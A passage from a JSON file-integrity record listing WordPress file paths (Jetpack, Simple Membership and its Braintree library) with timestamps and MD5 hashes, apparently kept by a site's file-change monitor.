hiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-cli.php\":{\"d\":1567815231,\"h\":\"ba4cac287bb87e4fd33c3607151cf48e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-signature.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-ixr-client.php\":{\"d\":1567815231,\"h\":\"713d1004ff7b4136e2c17fc7a0c9ca73\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-gutenberg.php\":{\"d\":1567815231,\"h\":\"8dbe3f912670a4c3909f86892b8a2efe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-twitter-cards.php\":{\"d\":1567815231,\"h\":\"6974a7740e10679546ed2037ed9f5913\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/admin-includes\\/class.swpm-payments-list-table.php\":{\"d\":1568443921,\"h\":\"b359fb35bb3bd0d028b3cf77a9ed1bc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/admin-includes\\/class.swpm-payments-admin-menu.php\":{\"d\":1568443921,\"h\":\"4555354c32956e2c1964d83c5ba1a27e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/admin-includes\\/class.swpm-payment-buttons-list-table.php\":{\"d\":1568443921,\"h\":\"1677557fa93e084619881b08774aaf9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/shortcode-related\\/class.swpm-shortcodes-handler.php\":{\"d\":1568443921,\"h\":\"7b7892f40efecb557edd758d98f7c353\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/common\\/class.swpm-list-table.php\":{\"d\":1568443921,\"h\":\"cc1f2c26ab2222ff6ba98a732e8dcb89\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-category-list.php\":{\"d\":1568443921,\"h\":\"6f5b03670d512786f36c66c0b38f20ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-comment-form-related.php\":{\"d\":1568443921,\"h\":\"6523161ed04d374f4eade31feabaabc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-session.php\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-members.php\":{\"d\":1568443921,\"h\":\"e1277cb54d3214e5acf806d80947b7e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-auth-permission-collection.php\":{\"d\":1568443921,\"h\":\"59a1af6e6b97392a45de84adeafbbb3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-installation.php\":{\"d\":1568443921,\"h\":\"7f83001b3cdd65c03168da68ec5e00d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-ajax.php\":{\"d\":1568443921,\"h\":\"499983e2dd2e386491aff3bd4721ba5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-utils-template.php\":{\"d\":1568443921,\"h\":\"5ec1b5042283ae202ca29b50d0a3b7bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-self-action-handler.php\":{\"d\":1568443921,\"h\":\"208434945d075819bd485b82592a327c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-init-time-tasks.php\":{\"d\":1568443921,\"h\":\"f0852cb9cd7bcf5052d85fe075151276\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-registration.php\":{\"d\":1568443921,\"h\":\"231988e61c1c86f4aa439bfecf63f628\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.simple-wp-membership.php\":{\"d\":1568443921,\"h\":\"ee42c2bf52fd4ee8742e3ad193272bb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-log.php\":{\"d\":1568443921,\"h\":\"5fba04108d6e74c743859ea019daf335\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-permission-collection.php\":{\"d\":1568443921,\"h\":\"6ffaa1dedcea3daa3df1ef6368cfb600\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-utils-member.php\":{\"d\":1568443921,\"h\":\"9a7b5764b4b31ca13ab59b3d86c29862\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-permission.php\":{\"d\":1568443921,\"h\":\"320262061f88e0d487e13cb144c5e97c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-transactions.php\":{\"d\":1568443921,\"h\":\"3f36880512dfeb7c6a1713284b4c9de0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-admin-registration.php\":{\"d\":1568443921,\"h\":\"7163031499696ecd8deaf50613ee8f83\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-front-registration.php\":{\"d\":1568443921,\"h\":\"fde08f991e1c3adf5396d3572bc39f1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-membership-levels.php\":{\"d\":1568443921,\"h\":\"4c1453c63aa598bd8242eb9cd5afb349\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-protection.php\":{\"d\":1568443921,\"h\":\"6c8da4ebeacc76d8a0904fa03a22f296\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-wp-loaded-tasks.php\":{\"d\":1568443921,\"h\":\"8ef27b0fe11421d36e01f36e697c5f49\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-notification-bus.php\":{\"d\":1568443921,\"h\":\"38d04a7cdca1312169b5bd0a4d2366bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-settings.php\":{\"d\":1568443921,\"h\":\"ec7b806208f06d8a051f4f03c29b7d7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-level-form.php\":{\"d\":1568443921,\"h\":\"de267254c55a1d452f0a68db15d8f08a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-messages.php\":{\"d\":1568443921,\"h\":\"fca4e9ba1b98aef0d008052d904c3272\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-utils-membership-level.php\":{\"d\":1568443921,\"h\":\"db83c812ae9d8af9986b6b1fea0ec186\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-post-list.php\":{\"d\":1568443921,\"h\":\"774245e171aa62c1082cfae5753bf5b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-cronjob.php\":{\"d\":1568443921,\"h\":\"2f6e036ac28ad6c8f7b1b3a89f744201\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-transfer.php\":{\"d\":1568443921,\"h\":\"470a88854eae8f3cce146662fd1674fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-membership-level.php\":{\"d\":1568443921,\"h\":\"7405cf89e52adffca993a964721588bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-utils.php\":{\"d\":1568443921,\"h\":\"4d00334971fcd6ef95b95440aacfce07\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-auth.php\":{\"d\":1568443921,\"h\":\"9495336b58da95ad26d24f6b110db393\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-form.php\":{\"d\":1568443921,\"h\":\"eb822b36161461a157f27a515af37398\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-front-form.php\":{\"d\":1568443921,\"h\":\"161a6d2bfed748d68667cd397b04200e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-protection-base.php\":{\"d\":1568443921,\"h\":\"49eb0acae09ab7ff74f75a34c7129d41\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-access-control.php\":{\"d\":1568443921,\"h\":\"b43590e36f3e83ae026112e25c4a4a7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-membership-level-custom.php\":{\"d\":1568443921,\"h\":\"4b593857b1690d75c8fb089ffd21ec68\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/classes\\/class.swpm-utils-misc.php\":{\"d\":1568443921,\"h\":\"d86ce22a4d34b3c33b97e8a287d0a4f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/js\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/js\\/swpm.password-meter.js\":{\"d\":1568443921,\"h\":\"4710809ccf4c157e5dbdf1b43cb03be5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/js\\/jquery.validationEngine-en.js\":{\"d\":1568443921,\"h\":\"16e4d54c6a65b044b86c65190227d821\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/js\\/swpm.validationEngine-localization.js\":{\"d\":1568443921,\"h\":\"a7bb1842d1c24615bd11ae9da814254f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/js\\/jquery.validationEngine.js\":{\"d\":1568443921,\"h\":\"c9299207b83bb5621eb4102ec26c8534\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/stripe_button_shortcode_view.php\":{\"d\":1568443921,\"h\":\"46fdd558cef263267248a13eaa98ee3b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_stripe_sca_buy_now_button.php\":{\"d\":1568443921,\"h\":\"bc30607681bd0f0b16eb840e2bdd22d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_stripe_buy_now_button.php\":{\"d\":1568443921,\"h\":\"66dc2a8c4828f9b09b1ffe5de821a9e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_braintree_buy_now_button.php\":{\"d\":1568443921,\"h\":\"a67dc56707456a2293d4675dfb9b0c2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/stripe_sca_button_shortcode_view.php\":{\"d\":1568443921,\"h\":\"777bec10b3f1d8b42542299d2a120432\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_paypal_smart_checkout_button.php\":{\"d\":1568443921,\"h\":\"717bb4c28d02e2eddbc9080b3e542ede\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_paypal_subscription_button.php\":{\"d\":1568443921,\"h\":\"3d08aaa2ddd20a8557fb7fd909ea086c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_paypal_buy_now_button.php\":{\"d\":1568443921,\"h\":\"785078b5acdca4a20f6fd2f7243d1ed1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_stripe_subscription_button.php\":{\"d\":1568443921,\"h\":\"5705952307777fa9aa9ba7b126e322c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/paypal_smart_checkout_button_shortcode_view.php\":{\"d\":1568443921,\"h\":\"7514ce2d0a7b508dc7b37d26892fd3bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/braintree_button_shortcode_view.php\":{\"d\":1568443921,\"h\":\"9a9f155976b42b2f577b045ba5f713b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/paypal_button_shortcode_view.php\":{\"d\":1568443921,\"h\":\"fbb7b57b839e7b814786c299d7db5b67\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/payment-gateway\\/admin_stripe_sca_subscription_button.php\":{\"d\":1568443921,\"h\":\"f372de347bf86f87f82dd330d2249135\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/admin_payment_settings.php\":{\"d\":1568443921,\"h\":\"a65d525aa860a10b6979842c5c3f7931\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/admin_create_payment_buttons.php\":{\"d\":1568443921,\"h\":\"57fb4575518abc759cfd92b814d64c0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/admin_payment_buttons.php\":{\"d\":1568443921,\"h\":\"cd1e2b05b153f33f537c18cddce4ea91\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/admin_edit_payment_buttons.php\":{\"d\":1568443921,\"h\":\"b249bd8092cbca7a2f8e19e25f482e65\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/payments\\/admin_all_payment_transactions.php\":{\"d\":1568443921,\"h\":\"e6a1f232ba6a60df56416d95b0dd790a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/join_us.php\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_member_form_common_js.php\":{\"d\":1568443921,\"h\":\"83e93202ad2f42cf1555f8dd77984b7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/account_delete_warning.php\":{\"d\":1568443921,\"h\":\"393bd24abd5b1a47d240d9519299b002\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/login.php\":{\"d\":1568443921,\"h\":\"d753dbb1e4e8c713dfb11221a6d8f96d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_edit_level.php\":{\"d\":1568443921,\"h\":\"f8b11c7b19556b6ace123d6be6ede239\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_tools_settings.php\":{\"d\":1568443921,\"h\":\"e7cdb003ddcf86e759992c954ce38321\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_membership_manage.php\":{\"d\":1568443921,\"h\":\"7aed722b0e4bb9956e992c8c5cc587a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_edit.php\":{\"d\":1568443921,\"h\":\"49289226428524f12e01a9d6dfee5170\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/forgot_password.php\":{\"d\":1568443921,\"h\":\"49b79e9551f3d9721ec2305c3fc1b2bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/add.php\":{\"d\":1568443921,\"h\":\"fab538aa4a5b22477447e9c21ec2b4d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_add_level.php\":{\"d\":1568443921,\"h\":\"7225547a8fa1bcd0bbcf91aa80425e5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_addon_settings.php\":{\"d\":1568443921,\"h\":\"c3edfcf3e5612c6ab14f6b03c9e2ebd7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/edit.php\":{\"d\":1568443921,\"h\":\"46446f9f015676f59ba40e18e5cda446\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_member_form_common_part.php\":{\"d\":1568443921,\"h\":\"1b8da4db7164c77c1fde1750ed9a7e99\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_members_list.php\":{\"d\":1568443921,\"h\":\"a2de67731eeb5fcd07e84ef0eed13de7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_settings.php\":{\"d\":1568443921,\"h\":\"e1b21004c4754adb1669871c1c9a2bc2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_category_list.php\":{\"d\":1568443921,\"h\":\"427a8a98b1c09dfc0e53d766d2224ebf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_add_ons_page.php\":{\"d\":1568443921,\"h\":\"93f60d6b06225ac10adb528cdc71d828\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_post_list.php\":{\"d\":1568443921,\"h\":\"9b9417270416d02308bcf14b30bb638b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/loggedin.php\":{\"d\":1568443921,\"h\":\"af8f90e854c8fee9f304c6b7078b7174\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/views\\/admin_add.php\":{\"d\":1568443921,\"h\":\"e735dbd5e038565ca53d36827f5f8298\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/languages\\/simple-membership.pot\":{\"d\":1568443921,\"h\":\"0fd342aab5fc62e4bb38e978ec795981\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm_handle_pp_ipn.php\":{\"d\":1568443921,\"h\":\"fd9a35c7fbed08568a9d9757ef345eed\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-smart-checkout-ipn.php\":{\"d\":1568443921,\"h\":\"8fb7d72cd0547b8b7644841478efb9c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-stripe-subscription-ipn.php\":{\"d\":1568443921,\"h\":\"580fc8e082ceafa95c93e48870717dd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm_handle_subsc_ipn.php\":{\"d\":1568443921,\"h\":\"eab1888e5017b2fa1c3fc43b1c68101b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-stripe-buy-now-ipn.php\":{\"d\":1568443921,\"h\":\"3be42c306b67ce682205005184d24780\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-stripe-sca-subscription-ipn.php\":{\"d\":1568443921,\"h\":\"943a24a1254393e80b8af798414e632f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-stripe-sca-buy-now-ipn.php\":{\"d\":1568443921,\"h\":\"23b11c35d442ed7fa5f6de48a433498f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/ipn\\/swpm-braintree-buy-now-ipn.php\":{\"d\":1568443921,\"h\":\"0d0adc0811bfd344a24f2930cb862a61\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/images\\/index.html\":{\"d\":1568443921,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Xml\\/Generator.php\":{\"d\":1568443921,\"h\":\"3a4f2ad0e8c6ae17788c218587dcfc03\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Xml\\/Parser.php\":{\"d\":1568443921,\"h\":\"af8f3729c58efd1d8f8fbf2672faf8a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/SSLCaFileNotFound.php\":{\"d\":1568443921,\"h\":\"fcc6e63349cad74ae9651af421cfec15\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/ForgedQueryString.php\":{\"d\":1568443921,\"h\":\"c8a65e4c3e20f4f834914d67a9e782cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Timeout.php\":{\"d\":1568443921,\"h\":\"48b27846cc5a412148be05ed081288f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/SSLCertificate.php\":{\"d\":1568443921,\"h\":\"2b23ad8a5f477accd97a5d26db3e9b68\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Authorization.php\":{\"d\":1568443921,\"h\":\"4b17dca02c715fcd50d6d80a40e808ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/InvalidSignature.php\":{\"d\":1568443921,\"h\":\"a627af00c19b01a92fe01d432e3296d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/TestOperationPerformedInProduction.php\":{\"d\":1568443921,\"h\":\"55dcb7ed8f8886a77edfd754a775567a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Connection.php\":{\"d\":1568443921,\"h\":\"97bf914cc5e53e573932b57eb60167be\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Configuration.php\":{\"d\":1568443921,\"h\":\"225dfca2a3fcb48620e971a03acc6213\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/ValidationsFailed.php\":{\"d\":1568443921,\"h\":\"3ee5ce23d0bda2f2794f5d5451111417\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/InvalidChallenge.php\":{\"d\":1568443921,\"h\":\"d825f5fc7acf8dd0e92dc886e7351721\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/DownForMaintenance.php\":{\"d\":1568443921,\"h\":\"f9827287436a4c51669fad4c637238a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/TooManyRequests.php\":{\"d\":1568443921,\"h\":\"84c506492eae180f47a325871c7e4d5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/NotFound.php\":{\"d\":1568443921,\"h\":\"7ee49bce52fc34db868443d569300470\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Authentication.php\":{\"d\":1568443921,\"h\":\"d21bc381984fa6078377aacfe930f27f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/ServerError.php\":{\"d\":1568443921,\"h\":\"2dbc5d988ed3bf2ba858dfe8c1ce68e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/UpgradeRequired.php\":{\"d\":1568443921,\"h\":\"22d1766b6d115cd7144ed2b9186afc85\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Exception\\/Unexpected.php\":{\"d\":1568443921,\"h\":\"eb871413e9d4c394b2e4a5d4da02c7d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Error\\/Codes.php\":{\"d\":1568443921,\"h\":\"50a4884c5e4879b759e31b2e22d4c86d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Error\\/ErrorCollection.php\":{\"d\":1568443921,\"h\":\"b32f1904ee32cf078470c109cec497c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\/Braintree\\/Error\\/Validation.php\":{\"d\":1568443921,\"h\":\"759f91a07cb25baef0f10a88ad5659f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/simple-membership\\/lib\\/braintree\\/lib\\